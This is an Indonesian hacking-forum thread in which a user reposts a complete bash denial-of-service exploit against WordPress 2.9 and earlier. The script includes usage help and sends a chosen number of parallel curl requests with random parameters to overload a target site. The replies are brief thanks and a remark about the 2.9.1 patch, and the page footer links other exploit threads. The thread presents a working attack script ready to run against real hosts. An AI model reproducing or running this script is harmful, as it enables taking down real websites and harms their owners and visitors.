Threaded Mode | Linear Mode

***wenkhairu*** · 01-04-2010, 04:20 AM

# Title: 0day Wordpress DOS <= 2.9
# EDB-ID: 10825
# CVE-ID: ()
# OSVDB-ID: ()
# Author: emgent
# Published: 2009-12-31
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
#!/bin/bash
#
# Copyright © 2009 Emanuele Gentili < emgent@backtrack.it >
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# WPd0s.sh
# This is a 0day DOS issue for Wordpress Core that use cache stressing with random
# parameter on multiple requests.
#

show_help(){
echo ""
echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <emgent@backtrack.it>"
}

show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " http://www.backtrack.it/~emgent/"
echo " emgent @ backtrack.it"
echo ""
}

show_prereq(){
echo ""
echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}

show_usage(){
echo ""
echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " usage $0 --host http://localhost/wordpress/ --requests 1000"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}

# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done

[ -z "$host" ] && { show_help; exit 1; }

for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done

# 2009-12-30 enJoy.

***petimati*** · 01-07-2010, 04:24 PM

top markotop...om wen ne

**Cruz3N** · 01-11-2010, 06:40 PM

Jiah.... Bahaya neh... Pantesan langsung ada versi 2.9.1-nya... Masih kena gak tuh...
Nice info Bro...

***petimati*** · 01-14-2010, 11:04 AM

mantap...om wen

***wenkhairu*** · 01-15-2010, 02:26 AM

nyang mantab bukan ane om om :)
tapi yang nemuin bug :)
ane mana tau nyang beginian, cuman copas aja :)

XGooooogle · 01-24-2010, 06:53 PM

eniwei thanks udah mengulurkan tangan

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[Tutor] WordPress Exploit (easy-comment-uploads/upload-form.php)	XPByte	16	1,045	05-19-2013 05:40 PM Last Post: oe_c0x
	WordPress LeagueManager Plugin v3.8 eskiel	go.id	12	184	04-01-2013 02:00 PM Last Post: beg3nk newb1e
	[Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload	Regel	11	673	02-02-2013 12:19 AM Last Post: copaker21
	Wordpress Plugins Pecemaker	chastiter	4	198	07-29-2012 07:58 AM Last Post: blackhariki
	- Joomla VS Wordpress Exploits Report:	nuxbie_cyber	11	358	02-27-2012 12:46 AM Last Post: Death Note
	Multiple WordPress Themes timthumb.php Vulnerabilites	tempe_mendoan	8	401	09-25-2011 08:53 AM Last Post: Initial-d
	Google Urchin 5.7.03 LFI Vulnerability 0day	sheehan	1	80	12-16-2010 05:59 PM Last Post: armytheludher
	10 Vuln plugins in wordpress	lolipop	10	216	10-23-2010 08:46 AM Last Post: dewancc
	Vuln WP-Cumulus 1.20 for WordPress	p0k3r	8	216	07-14-2010 12:13 AM Last Post: p0k3r
	wordpress 1.7.4 SQLinjection	MaViA_HaXx0r	6	236	06-28-2010 11:20 AM Last Post: scr34mz